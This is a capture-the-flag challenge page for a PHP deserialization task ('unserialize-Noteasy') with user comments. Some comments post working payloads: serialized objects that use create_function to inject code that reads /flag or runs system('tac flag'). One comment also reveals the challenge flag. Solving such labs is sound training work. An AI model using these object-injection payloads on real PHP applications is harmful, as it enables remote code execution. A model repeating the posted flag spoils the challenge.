unserialize-NoteasyWEB 未解决
分数:
30
金币:
3
题目作者:
云牧青
一 血:
Lazzaro
一血奖励:
5金币
解 决:
683
提 示:
描 述:
不简单的反序列化
评论
ixin 1月前
举报
真心不会等在提升一段时间再来做
对对对对对对对对 1月前
举报
看评论区师傅们博客内对于create_function的理解,另外还有序列化的格式语法
gxrtbtc 5月前
举报
序列化字符串中%3B%7D%3B部分导致结构断裂(未闭合的花括号和分号)1013 私有属性命名未正确处理空字符\0(应为\0类名\0属性名格式)13 功能失效 create_function构造的函数体;}highlight_file("/flag");/*存在语法错误: ;}会提前结束函数定义 /*未正确注释后续代码21
locust 1年前
举报
O%3A7%3A%22Noteasy%22%3A2%3A%7Bs%3A10%3A%22%00Noteasy%00a%22%3Bs%3A15%3A%22create_function%22%3Bs%3A10%3A%22%00Noteasy%00b%22%3Bs%3A29%3A%22%3B%7D%3Bhighlight_file%28%22%2Fflag%22%29%3B%2F%2A%22%3B%7D
Jiafeng 1年前
举报
flag{d45ca0bf896cdf6a9903d5030554214e} ; 这里主要是考察反序列化的使用,这里给出一个连接,学会使用create_function函数来进行反序列化的操作; https://blog.csdn.net/weixin_61785633/article/details/131159553
雾島风起時 1年前
举报
真心不会等在提升一段时间再来做
小猫猫嗷嗷叫 1年前
举报
p=O:7:"Noteasy":2:{s:10:"%00Noteasy%00a";s:15:"create_function";s:10:"%00Noteasy%00b";s:24:";}system("tac%20flag");/*;";}
xiaoxiao972521 1年前
举报
一看评论都寄了,我就不开场景了,啊哈哈哈哈
XRain 2年前
举报
这种题不会真没办法,相当于当场挖出 create_function 的漏洞,挺难的,只能靠平时看文章和关注安全动态,记下各种技巧。
Youmos 2年前
举报
寄了,不会